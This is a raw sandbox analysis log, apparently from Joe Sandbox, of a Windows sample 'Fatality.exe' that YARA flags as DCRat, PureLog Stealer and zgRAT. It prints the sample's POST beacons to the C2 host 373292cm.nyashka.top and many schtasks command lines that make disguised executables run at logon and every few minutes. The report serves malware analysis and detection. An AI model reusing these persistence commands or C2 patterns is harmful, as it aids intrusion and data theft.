                                    Data Ascii: _VYTTATP[_ZQYWXPWX]RWXS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.3+"=0 #%+><<=6<-;\7?4 $V<( 0)Y/&F$.Y/
                                    Aug 25, 2024 15:45:05.969763041 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:06.169203043 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    112192.168.2.64984080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:06.297163963 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:06.654211998 CEST2516OUTData Raw: 5f 50 5c 57 54 46 54 5e 5b 5f 5a 51 59 55 58 54 57 5c 5d 5f 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _P\WTFT^[_ZQYUXTW\]_W^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.#5><]#V=Y==\<%Z?>+ ( !/<#_4;.&F$.Y/-
                                    Aug 25, 2024 15:45:07.150520086 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:07.150948048 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:07.151000023 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    113192.168.2.64984180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:07.291388035 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:07.638686895 CEST2512OUTData Raw: 5a 57 59 54 54 49 51 5c 5b 5f 5a 51 59 57 58 5e 57 5e 5d 5e 57 5b 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZWYTTIQ\[_ZQYWX^W^]^W[SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,#D5=; **#?.+>$"<!2$S?9+]#8&F$.Y/
                                    Aug 25, 2024 15:45:08.788646936 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:08.788928032 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:08.788960934 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:08.789190054 CEST183INHTTP/1.1 100 Continue
                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 35 20 41 75 67 20 32 30 32 34 20 31 33 3a 34 35 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3b 55 5f 5b
                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 25 Aug 2024 13:45:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[
                                    Aug 25, 2024 15:45:08.791230917 CEST183INHTTP/1.1 100 Continue
                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 35 20 41 75 67 20 32 30 32 34 20 31 33 3a 34 35 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3b 55 5f 5b
                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 25 Aug 2024 13:45:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:43:00
                                    Start date:25/08/2024
                                    Path:C:\Users\user\Desktop\Fatality.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Fatality.exe"
                                    Imagebase:0x890000
                                    File size:3'517'117 bytes
                                    MD5 hash:A5A9CDE94B59BC5B8B88D60FC28177D3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:09:43:00
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                    Imagebase:0x7ff642ec0000
                                    File size:21'312 bytes
                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:43:02
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe"
                                    Imagebase:0x930000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:09:43:18
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:09:43:18
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:09:43:18
                                    Start date:25/08/2024
                                    Path:C:\Bridgemonitor\BridgeInto.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Bridgemonitor/BridgeInto.exe"
                                    Imagebase:0x840000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 100%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:09:43:19
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                    Imagebase:0x7ff642ec0000
                                    File size:21'312 bytes
                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:09:43:19
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                    Imagebase:0x7ff642ec0000
                                    File size:21'312 bytes
                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:9
                                    Start time:09:43:20
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
                                    Imagebase:0x7ff6af610000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"
                                    Imagebase:0x7ff6470d0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
                                    Imagebase:0x7ff6af610000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"
                                    Imagebase:0x7ff6470d0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 6 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Imagebase:0xd60000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, ReversingLabs
                                    Has exited:false

                                    General

                                    Target ID:26
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Imagebase:0x2f0000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:29
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:30
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:31
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:32
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 10 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "BridgeInto" /sc ONLOGON /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:34
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 9 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:35
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat"
                                    Imagebase:0x7ff7b8d10000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:36
                                    Start time:09:43:23
                                    Start date:25/08/2024
